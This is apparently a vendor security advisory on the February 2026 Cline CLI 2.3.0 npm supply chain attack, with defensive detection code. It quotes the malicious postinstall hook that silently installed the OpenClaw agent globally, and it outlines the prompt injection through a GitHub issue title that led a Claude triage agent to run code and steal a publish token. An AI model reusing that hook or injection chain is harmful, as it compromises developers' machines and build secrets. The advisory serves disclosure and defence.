Cline CLI 2.3.0 Supply Chain Attack: OpenClaw Unauthorized Installation on Developer and CI/CD Systems
- Feb 22

Executive Summary
On February 17, 2026, a supply chain attack targeted the Cline CLI open-source package, resulting in the unauthorized installation of OpenClaw, an autonomous AI agent, on developer and CI/CD systems. The attack was executed by publishing a malicious version (cline@2.3.0) to the npm registry using a compromised publish token. This version included a post-install script that silently installed OpenClaw globally on affected machines. The incident window lasted approximately eight hours, during which the malicious package was downloaded around 4,000 times. No evidence of direct data exfiltration or additional malicious payloads was found; however, the installation of OpenClaw introduced significant risk due to its broad system-level permissions and persistent presence. The attack exploited a misconfiguration in the Cline GitHub Actions workflow, specifically through a prompt injection vulnerability that enabled the theft of publication credentials. The incident was mitigated by deprecating the compromised version, revoking the affected token, and releasing a clean update (cline@2.4.0). The overall impact is considered low, as OpenClaw itself is not inherently malicious, but the event highlights critical weaknesses in supply chain security and the governance of AI-powered automation in software development pipelines (The Hacker News, Endor Labs, StepSecurity).
Technical Information
The Cline CLI 2.3.0 supply chain attack represents a sophisticated compromise of the npm software ecosystem, leveraging both technical and procedural weaknesses in the package publication process. The attacker gained access to a long-lived npm publish token by exploiting a prompt injection vulnerability—codenamed "Clinejection"—in the Cline GitHub Actions workflow. This vulnerability allowed arbitrary code execution within the CI pipeline by manipulating the AI agent (Claude) responsible for triaging GitHub issues. The attacker poisoned the GitHub Actions cache and triggered the privileged nightly release workflow, ultimately stealing the npm publish token and using it to publish the malicious cline@2.3.0 package (The Hacker News).
The malicious package was published at 03:26 PT on February 17, 2026, and remained available until approximately 11:30 PT the same day. During this period, any system that installed or updated Cline CLI to version 2.3.0 automatically executed a post-install script embedded in the package's package.json file:
"scripts": { "postinstall": "npm install -g openclaw@latest" }
This script installed OpenClaw globally on the affected system without user consent or notification (StepSecurity). OpenClaw is an open-source AI agent framework designed to run locally with extensive system permissions, including terminal and disk access. It installs a persistent Gateway daemon (via launchd on macOS or systemd on Linux) that exposes a WebSocket server on ws://127.0.0.1:18789. The agent can access credentials and secrets stored in user directories, execute arbitrary shell commands via its operator API, and persist across system reboots.
A critical vulnerability in OpenClaw versions prior to 2026.1.29 (CVE-2026-25253, CVSS 8.8) allowed unauthenticated operator-level access through a crafted WebSocket handshake, further increasing the risk for affected systems (StepSecurity). Although OpenClaw itself is not classified as malware, its unauthorized installation and potential for privilege escalation and credential access present a significant security concern, especially in CI/CD environments where sensitive secrets may be exposed.
Technical analysis of the attack revealed several key indicators of compromise. The malicious cline@2.3.0 package deviated from the established trusted publishing pattern, being published manually by the user account "clinebotorg" rather than through the automated, provenance-backed GitHub Actions pipeline. The package also lacked npm provenance attestations, which are cryptographic proofs linking a published package to its source repository and build pipeline. These anomalies were detected by automated monitoring systems, prompting rapid response and deprecation of the compromised version (StepSecurity, Endor Labs).
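The anomalies described above (a publisher change, missing provenance, and a newly added install hook) can be checked mechanically against registry metadata. The following is an added example, not code from StepSecurity, Endor Labs or the Cline project; the package name example-cli, the publisher names and the timestamps are constructed, and only the field names (_npmUser, dist.attestations, scripts, time) follow the npm registry's metadata format.

```javascript
// Builds one constructed version entry in the shape the npm registry returns.
function release(publisher, withProvenance, scripts) {
  const dist = withProvenance
    ? { attestations: { provenance: { predicateType: "https://slsa.dev/provenance/v1" } } }
    : {};
  return { _npmUser: { name: publisher }, dist, scripts };
}

// Constructed packument (not real registry data); publisher names are assumptions.
const samplePackument = {
  name: "example-cli",
  time: {
    "2.2.2": "2026-01-10T10:00:00.000Z",
    "2.2.3": "2026-02-01T10:00:00.000Z",
    "2.3.0": "2026-02-17T11:26:00.000Z",
  },
  versions: {
    "2.2.2": release("GitHub Actions", true, {}),
    "2.2.3": release("GitHub Actions", true, {}),
    "2.3.0": release("example-bot", false, { postinstall: "npm install -g openclaw@latest" }),
  },
};

const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Compares each release with the one published before it and reports pattern breaks.
function auditReleases(packument) {
  const ordered = Object.keys(packument.versions)
    .sort((a, b) => new Date(packument.time[a]) - new Date(packument.time[b]));
  const findings = [];
  let prev = null; // the first release is the baseline and is never flagged
  for (const version of ordered) {
    const cur = packument.versions[version];
    const hasProv = Boolean(cur.dist?.attestations?.provenance);
    const publisher = cur._npmUser?.name;
    const hooks = INSTALL_HOOKS.filter((h) => cur.scripts?.[h]);
    const reasons = [];
    if (prev) {
      if (prev.hasProv && !hasProv) reasons.push("provenance-dropped");
      if (prev.publisher !== publisher) reasons.push("publisher-changed");
      const added = hooks.filter((h) => !prev.hooks.includes(h));
      if (added.length) reasons.push("install-hook-added:" + added.join(","));
    }
    if (reasons.length) findings.push({ version, reasons });
    prev = { hasProv, publisher, hooks };
  }
  return findings;
}

console.log(JSON.stringify(auditReleases(samplePackument), null, 2));
```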
The attack chain mapped to several MITRE ATT&CK techniques, including T1195.002 (Supply Chain Compromise), T1059.003 (Command and Scripting Interpreter), T1546.003 (Event Triggered Execution), T1547.001 (Boot or Logon Autostart Execution), T1552.001 (Unsecured Credentials), and T1071.001 (Application Layer Protocol: Web Protocols). The evidence supporting these mappings includes direct analysis of package metadata, workflow logs, and observed behavior of the installed OpenClaw agent.
No direct attribution to a specific threat actor has been made. The attack is consistent with opportunistic exploitation of misconfigurations and weak credential hygiene in open-source software pipelines. The use of prompt injection against an AI agent in a CI/CD workflow is a novel technique, marking a significant evolution in the threat landscape for software supply chain security (The Hacker News).
Affected Versions & Timeline
The only affected version of Cline CLI is 2.3.0, published to the npm registry at 03:26 PT on February 17, 2026. The malicious package was available for approximately eight hours, until it was deprecated at 11:30 PT the same day. During this window, the package was downloaded roughly 4,000 times, primarily by developers and CI/CD systems that did not pin their dependency versions (StepSecurity, Endor Labs).
The incident timeline is as follows:
At 03:26 PT (11:26 UTC) on February 17, 2026, the malicious cline@2.3.0 package was published to npm by the "clinebotorg" account.
At 11:40 UTC, StepSecurity's artifact monitoring system flagged the anomalous release due to deviations from trusted publishing patterns and missing provenance.
At 19:23 UTC, the maintainers released a clean version via the trusted pipeline and deprecated the malicious version.
On February 18, 2026, the incident was publicly disclosed, with approximately 4,000 downloads recorded during the exposure window (StepSecurity).
The compromised package tarball and metadata remained available for some time after deprecation, but the npm publish token was revoked, and the npm publishing mechanism was updated to use OpenID Connect (OIDC) via GitHub Actions to prevent recurrence (The Hacker News).
The incident did not affect the Cline Visual Studio Code extension or JetBrains plugin. Only installations of the CLI tool via npm during the affected window were impacted (The Hacker News).
Threat Activity
The threat activity in this incident centered on the exploitation of a prompt injection vulnerability in the Cline GitHub Actions workflow. By crafting a malicious GitHub issue title, the attacker manipulated the AI agent (Claude) to execute arbitrary code within the triage workflow. This allowed the attacker to poison the GitHub Actions cache and trigger the privileged nightly release workflow, resulting in the theft of the npm publish token. With this token, the attacker published the malicious cline@2.3.0 package, embedding a post-install script to install OpenClaw globally on any system that installed or updated the package (The Hacker News).
OpenClaw itself is a legitimate open-source AI agent framework, but its unauthorized installation as a persistent, privileged daemon on developer and CI/CD systems created a significant risk. The agent's capabilities include access to credentials and secrets, arbitrary command execution, and persistence across reboots. A critical vulnerability (CVE-2026-25253) in older versions of OpenClaw further increased the risk by allowing unauthenticated operator-level access via its WebSocket API (StepSecurity).
The attack did not include additional malicious payloads or direct data exfiltration, and no evidence of further compromise has been reported. However, the event demonstrates the potential for significant impact when supply chain attacks target widely used developer tools and exploit weaknesses in automated CI/CD workflows (Endor Labs).
Mitigation & Workarounds
The following mitigation steps are recommended, prioritized by severity:
Critical: Immediately check all developer and CI/CD systems for the presence of cline@2.3.0. If this version is installed, update to cline@2.4.0 or later without delay (Endor Labs).
Critical: Remove OpenClaw if it was installed unintentionally by running npm uninstall -g openclaw. For systems where OpenClaw persists as a daemon, ensure the associated launchd or systemd service is stopped and disabled (StepSecurity).
High: For CI/CD environments, rotate any credentials, secrets, or tokens that may have been accessible to the affected build agents, especially if OpenClaw was installed and running during the exposure window. Review logs for unauthorized access or anomalous activity.
High: Audit all npm dependencies for provenance and trusted publishing attestations. Ensure that all package installations are version-pinned to prevent unintentional upgrades to compromised versions.
Medium: Review and harden CI/CD workflows to minimize permissions granted to automation agents, especially those powered by AI. Disable traditional token-based publishing in favor of OIDC-based trusted publishing mechanisms (Endor Labs).
Medium: Monitor for the presence of OpenClaw-related processes, files, and network activity (e.g., WebSocket server on ws://127.0.0.1:18789) on developer and build systems.
Low: Educate development and DevOps teams about the risks of supply chain attacks, prompt injection vulnerabilities, and the importance of provenance in open-source dependencies.
No further action is required for users of the Cline Visual Studio Code extension or JetBrains plugin, as these were not affected by the incident (The Hacker News).
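The first and fourth mitigation items (finding cline@2.3.0 and pinning versions) can be checked across repositories from their lockfiles. This is an added example, not code from the advisory or its sources; the lockfile contents and the names build-tools and some-wrapper are constructed, and it assumes a package-lock.json with lockfileVersion 2 or 3, where resolved packages are listed under packages keyed by install path.

```javascript
// Affected release named in the advisory.
const BAD = { name: "cline", version: "2.3.0" };

// Constructed package-lock.json content (lockfileVersion 3) for illustration only.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    "": { name: "build-tools", devDependencies: { cline: "^2.2.0" } },
    "node_modules/cline": { version: "2.3.0", hasInstallScript: true },
    "node_modules/some-wrapper": { version: "1.0.0" },
    "node_modules/some-wrapper/node_modules/cline": { version: "2.2.3" },
  },
};

const EXACT_PIN = /^\d+\.\d+\.\d+(-[\w.]+)?$/;
const NM = "node_modules/";

function auditLock(lock) {
  const findings = [];
  for (const [path, entry] of Object.entries(lock.packages ?? {})) {
    if (path === "") {
      // The root entry mirrors package.json: a range specifier can float to a new release.
      const deps = { ...entry.dependencies, ...entry.devDependencies, ...entry.optionalDependencies };
      const spec = deps[BAD.name];
      if (spec && !EXACT_PIN.test(spec)) {
        findings.push({ type: "unpinned", path: "package.json", detail: spec });
      }
      continue;
    }
    // The package name follows the last "node_modules/" segment (covers nesting and scopes).
    const name = entry.name ?? path.slice(path.lastIndexOf(NM) + NM.length);
    if (name === BAD.name && entry.version === BAD.version) {
      findings.push({
        type: "compromised",
        path,
        detail: entry.version,
        installScript: Boolean(entry.hasInstallScript),
      });
    }
  }
  return findings;
}

console.log(auditLock(sampleLock));
```

A lockfile scan does not reveal the globally installed OpenClaw package or its daemon, which are not recorded in a project lockfile; those still need the host-level checks listed above.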
References
https://thehackernews.com/2026/02/cline-cli-230-supply-chain-attack.html (Published: February 20, 2026)
https://www.endorlabs.com/learn/supply-chain-attack-targeting-cline-installs-openclaw (Published: February 18, 2026)
https://www.stepsecurity.io/blog/cline-supply-chain-attack-detected-cline-2-3-0-silently-installs-openclaw (Published: February 17, 2026)
About Rescana
Rescana provides a third-party risk management (TPRM) platform designed to help organizations identify, assess, and monitor supply chain risks in real time. Our platform enables continuous monitoring of open-source dependencies, automated detection of anomalous package releases, and assessment of CI/CD pipeline security posture. We support integration with major package registries and CI/CD platforms, providing actionable insights to mitigate risks from compromised credentials, misconfigurations, and unauthorized package publications. For questions or further assistance, contact us at ops@rescana.com.


